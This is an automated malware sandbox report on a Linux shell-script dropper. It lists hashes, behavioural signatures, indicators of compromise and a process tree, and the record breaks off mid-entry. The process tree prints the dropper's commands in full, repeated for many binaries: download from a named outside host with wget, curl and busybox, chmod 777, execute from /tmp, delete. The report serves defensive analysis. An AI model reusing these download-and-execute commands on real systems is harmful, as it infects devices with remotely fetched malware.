Analysis
-
max time kernel
109s -
max time network
139s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:24
Static task
static1
Behavioral task
behavioral1
Sample
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
-
Size
10KB
-
MD5
39af5a8e20eb9037c16b16bbdb233387
-
SHA1
fa93ebed804f88f9810f418aa96d520d93249855
-
SHA256
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58
-
SHA512
82d0395702b8b6084c5c890074c5fe8cce1bb3fd3a61b94b1fb466c306072308348c69dd1745e1a944949d06cf55cf2f18862833d212ece5910d32d914d7eb4b
-
SSDEEP
192:QQqIcwDH+mKFlIZx/QVgh3Xql5cjG5Q3Xql54C0cwDH+mEFlIZx/F:QQq5VgNjG5CCY
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 864 chmod 941 chmod 841 chmod 892 chmod 948 chmod 983 chmod 744 chmod 990 chmod 962 chmod 817 chmod 899 chmod 976 chmod 997 chmod 871 chmod 878 chmod 955 chmod 763 chmod 920 chmod 885 chmod 906 chmod 810 chmod 969 chmod 1004 chmod 790 chmod 934 chmod 1011 chmod 913 chmod 927 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc 745 ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc /tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO 764 yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO /tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 791 AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 /tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I 811 ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I /tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u 818 LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u /tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw 842 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw /tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm 865 Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm /tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR 872 q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR /tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA 879 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA /tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N 886 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N /tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh 893 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh /tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY 900 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY /tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD 907 OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD /tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 914 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 /tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm 921 Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm /tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR 928 q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR /tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA 935 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA /tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N 942 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N /tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh 949 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh /tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY 956 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY /tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD 963 OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD /tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 970 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 /tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc 977 ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc /tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO 984 yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO /tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 991 AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 /tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I 998 ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I /tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u 1005 LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u /tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw 1012 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 909 wget 937 wget 961 busybox 759 busybox 806 curl 875 curl 882 curl 933 busybox 952 curl 1000 wget 912 busybox 914 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 915 rm 993 wget 722 wget 824 curl 836 busybox 910 curl 895 wget 917 curl 938 curl 944 wget 820 wget 868 curl 877 busybox 881 wget 973 curl 1001 curl 972 wget 982 busybox 1007 wget 747 wget 905 busybox 926 busybox 930 wget 970 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 971 rm 750 curl 777 curl 855 curl 966 curl 924 curl 986 wget 1003 busybox 1008 curl 947 busybox 965 wget 743 busybox 816 busybox 870 busybox 916 wget 898 busybox 902 wget 919 busybox 987 curl 958 wget 959 curl 968 busybox 980 curl 769 wget 848 wget 903 curl 954 busybox 814 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA curl File opened for modification /tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw curl File opened for modification /tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 curl File opened for modification /tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 curl File opened for modification /tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO curl File opened for modification /tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u curl File opened for modification /tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw curl File opened for modification /tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD curl File opened for modification /tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD curl File opened for modification /tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 curl File opened for modification /tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u curl File opened for modification /tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc curl File opened for modification /tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I curl File opened for modification /tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA curl File opened for modification /tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N curl File opened for modification /tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR curl File opened for modification /tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N curl File opened for modification /tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 curl File opened for modification /tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I curl File opened for modification /tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm curl File opened for modification /tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR curl File opened for modification /tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY curl File opened for modification /tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY curl File opened for modification /tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO curl File opened for modification /tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc curl File opened for modification /tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh curl File opened for modification /tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm curl File opened for modification /tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh curl
Processes
-
/tmp/70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh/tmp/70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh1⤵PID:714
-
/bin/rm/bin/rm bins.sh2⤵PID:718
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- System Network Configuration Discovery
PID:722
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- System Network Configuration Discovery
PID:743
-
-
/bin/chmodchmod 777 ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc./ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵PID:746
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- System Network Configuration Discovery
PID:747
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- System Network Configuration Discovery
PID:759
-
-
/bin/chmodchmod 777 yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO./yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵PID:768
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- System Network Configuration Discovery
PID:769
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:777
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵PID:786
-
-
/bin/chmodchmod 777 AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05./AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵PID:797
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵PID:799
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵PID:809
-
-
/bin/chmodchmod 777 ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I./ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵PID:812
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵PID:813
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- System Network Configuration Discovery
PID:816
-
-
/bin/chmodchmod 777 LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u./LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵PID:819
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- System Network Configuration Discovery
PID:820
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- System Network Configuration Discovery
PID:836
-
-
/bin/chmodchmod 777 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw./9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵PID:846
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵PID:863
-
-
/bin/chmodchmod 777 Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm./Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵PID:866
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵PID:867
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- System Network Configuration Discovery
PID:870
-
-
/bin/chmodchmod 777 q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR./q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵PID:873
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵PID:874
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- System Network Configuration Discovery
PID:877
-
-
/bin/chmodchmod 777 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA./3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵PID:880
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- System Network Configuration Discovery
PID:881
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵PID:884
-
-
/bin/chmodchmod 777 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N./4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵PID:891
-
-
/bin/chmodchmod 777 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh./97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- System Network Configuration Discovery
PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY./4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- System Network Configuration Discovery
PID:905
-
-
/bin/chmodchmod 777 OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD./OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3./nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:914
-
-
/bin/rmrm nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm./Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- System Network Configuration Discovery
PID:926
-
-
/bin/chmodchmod 777 q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR./q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- System Network Configuration Discovery
PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/chmodchmod 777 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA./3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵PID:940
-
-
/bin/chmodchmod 777 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N./4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- System Network Configuration Discovery
